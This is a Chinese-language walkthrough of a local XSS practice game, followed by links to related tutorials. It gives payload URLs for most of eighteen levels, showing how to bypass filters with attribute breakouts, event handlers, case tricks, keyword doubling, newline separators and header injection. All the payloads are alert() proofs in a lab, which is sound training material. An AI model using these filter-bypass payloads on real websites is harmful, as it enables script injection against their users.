Xss小游戏通关攻略

实验环境：xss小游戏源码+phpstudy

源码地址：https://files.cnblogs.com/files/Eleven-Liu/xss%E7%BB%83%E4%B9%A0%E5%B0%8F%E6%B8%B8%E6%88%8F.zip

实验步骤：启动phpstudy，浏览器访问127.0.0.1/xss/后提示点击图片进入第一关。

第一关：输入的变量直接被输出，直接构造payload即可。

http://127.0.0.1/xss/level1.php?name=<script>alert(1)</script>

http://127.0.0.1/xss/level1.php?name=test‘<script>alert(1)</script>

第二关：搜索框的XSS，输入的变量直接输出到input标签内，闭合input标签，构造XSS，备注：echo语句输出到页面时使用了htmlspecialchars函数。

payload:

http://127.0.0.1/xss/level2.php?keyword=test"><script>alert(1)</script>

第三关：输入的变量被htmlspecialchars函数处理了，这个函数处理的字符有< > " ，没有处理单引号，因此利用单引号构造payload，先通过单引号闭合value

第四关：大于号小于号被过滤了，构造不包含这两个符号的payload，value的值与第三关有所差异，这里需要使用双引号用于闭合value标签

http://127.0.0.1/xss/level4.php?keyword=test"οnmοuseοver='alert(1)'

第五关：<script 和on被替换了，构造不含这两个的payload

127.0.0.1/xss/level5.php?keyword=find a way out!1"><a href="javascript:alert(1)">

第六关：比第五关过滤的东西更多，包括了src data href ，可以把这些关键字大写，以绕过这些过滤，payload

http://127.0.0.1/xss/level6.php?keyword=break it out!1"><SCRIPT>alert(1)</script>

第七关：增加strtolower函数把输入变量转成了小写，但过滤的字符强制变成空格，可以使用<scriscritpt>，中间的script变成了空格，正好变成了<script>

127.0.0.1/xss/level7.php?keyword=move up!1"><scriscriptpt>alert(1)</scriscriptpt>

第八关：input中输入的变量通过htmlspecialchars被处理了，且双引号被替换成空，无法通过双引号闭合value。这里的输入被添加至超链接中，直接构造payload:javascript，对其中的字母进行实体编码

搜索框中输入 javascript:alert(1) 点击添加到友情链接，点击链接

第九关：上一关的基础上，判断输入的链接是否包含http://，因为用的是strpos函数，没有限制必须是开始的位置，所以在上一关的基础上，修改payload为 javascript:alert('http://')

第十关：keyword变量没办法构造payload，发现隐藏变量t_sort，可以被写入，但过滤了大于小于号，构造不含大于小于号的payload，类型改为text，具体如下：

http://127.0.0.1/xss/level10.php?t_sort="οnmοuseοver='alert(1)'type="text"

第十一关：查看源码：可以看到t_ref的value是我们访问这个网页的referer值，故可以抓包修改referer，在referer后加入” οnmοuseοver='alert(1)' type="text"。

第十二关：查看源码，$str33最初是由HTTP_USER_AGENT过滤< > 而来，修改User-Agent，在后面加上" οnmοuseοver='alert(1)' type="text"。

第十三关：同上，查看源码，$str33最初是由cookie过滤< > 而来，修改cookie，在后面加上" οnmοuseοver='alert(1)' type="text"。

第十四关：网站已经打不开，略过

第十五关：angularjs的ng-include

http://127.0.0.1/xss /level15.php?src='level1.php?name=test<img src=1 οnerrοr=alert(1)>'

第十六关：script / 空格被过滤了，用%0d换行符绕过

http://127.0.0.1/xss/level16.php?keyword=%3Cimg%0dsrc=1%0dοnerrοr=alert(2)%3Ealert(2)

http://127.0.0.1/xss /level16.php?keyword=<img%0Dsrc=1%0Dοnerrοr=alert()>

http://127.0.0.1/xss /level16.php?keyword=<img%0asrc=1%0aοnerrοr=alert()>

http://127.0.0.1/xss /level16.php?keyword=<img%0asrc=x%0donError=alert('xss')>

http://127.0.0.1/xss /level16.php?keyword=<iframe%0asrc=x%0dοnmοuseοver=alert’1’></iframe>

http://127.0.0.1/xss /level16.php?keyword=<svg%0aοnlοad=alert’1’></svg>

第十七关：arg01和arg02 被htmlspecialchars过滤了，通过οnmοuseοver='alert(1)'绕过。

http://127.0.0.1/xss/level17.php?arg01=a&arg02=%20οnmοuseοver=alert%282%29

第十八关：同十七，直接把arg02 设置为οnmοuseοver='alert(1)'

http://192.168.40.128/xss/level18.php?arg01=a&arg02= οnmοuseοver=alert(2)

第十九关和二十关属于Flash xss,略过。

Xss小游戏通关攻略带解释相关推荐

2022-渗透测试-xss小游戏通关
这是一个在线靶场-xss小游戏通关,一共6关.链接地址: XSS game (xss-game.appspot.com)https://xss-game.appspot.com/登陆成功后,页面如下. ...
XSS小游戏通关题解
写这篇文章的目的以前在学习和利用XSS漏洞的时候,最多的感受就是知识体系不够全面,不能快速准确的构造出payload,最近在整理xss漏洞利用的一些方法,一来希望自己能够准确快速的针对漏洞点构造出p ...
git小游戏通关攻略（基础、高级、远程）
Samuel066 亲测爆肝git游戏通关攻略,史上最快,希望能够帮助到你们. Learng git baranching: https://learngitbranching.js.org/?loc ...
Xss小游戏通关秘籍
本文作者:kale 本文首发于"合天智汇"公众号,转载请联系公众号! 一. 题记最近发现一个xss的攻防网站,界面很有意思,很适合寓教于乐.于是玩了一下午,特此记录下来!xss姿 ...
xss靶场练习(二)之xss小游戏
前言话说自从网络安全修正法推出, 不敢轻易动国内的网站, 平时就打打靶场, 本文记录练习之路. xss小游戏在线地址: http://test.ctf8.com/ xss小游戏一共二十关. ...
【git小游戏通关大全】
前言: 最近为了弄懂git的使用和知识点,老师让我们在git小游戏Learn Git Branching多加练习,研究了好久游戏关总是突破不了,查看了很多资料和视频最终总结整理出一套完整的游戏闯关答案 ...
CSDN官方2048小游戏通关秘诀及复现
目录一.前言二.通关小诀窍 1.游戏规则介绍 2.基于规则的一种相对全局最优方法三.游戏复现 1.编程环境介绍 2.tkinter介绍 3.编程复现游戏效果四.尾声及附录代码 1.尾声 2.附 ...
XSS挑战之旅---游戏通关攻略
最近发现一个有趣的XSS闯关小游戏,游戏的作者是先知社区的大佬Mramydnei,喜欢XSS的大家可以一起来学习交流. 现在我把自己在前面的十八关里面的闯关过程记录一下,大神绕行,我是菜鸟,大家可以一 ...
再来一个小游戏——原生js逐句解释开发简易版别踩白块，附源码
芜湖!没想到上个做扫雷的阅读量这么高(激动) 先捞一下:做个小项目~纯原生JS手把手逐句解释写一个扫雷小游戏(附源码) 快看↑ 这次就做一个别踩白块吧哈哈哈哈哈最终版演示地址:钢琴块源码在最后!最 ...

Xss小游戏通关攻略带解释

Xss小游戏通关攻略

Xss小游戏通关攻略带解释相关推荐

最新文章

热门文章